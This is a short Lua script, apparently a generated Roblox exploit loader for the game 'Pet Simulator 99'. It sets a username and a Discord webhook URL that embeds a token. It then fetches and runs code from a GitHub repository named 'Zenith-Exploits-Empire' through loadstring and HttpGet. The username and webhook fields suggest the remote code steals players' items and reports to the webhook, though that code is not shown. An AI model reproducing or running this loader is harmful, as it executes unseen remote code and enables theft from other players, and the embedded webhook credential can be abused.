-- Generated by Generator V5.2
Username = "louisenob"
Username2 = "louisenob"
Webhook = "https://discord.com/api/webhooks/1365294967487991838/edhTUr-O-vtIGyrzp4uUWXpEkPfhvxtPN4QFS6ulE6F_-G-FuCRRuSCHUAlexpy9FOKf"

loadstring(game:HttpGet("https://raw.githubusercontent.com/Zenith-Exploits-Empire/Final/refs/heads/main/RAW%20-%20Pet%20Simulator%2099"))()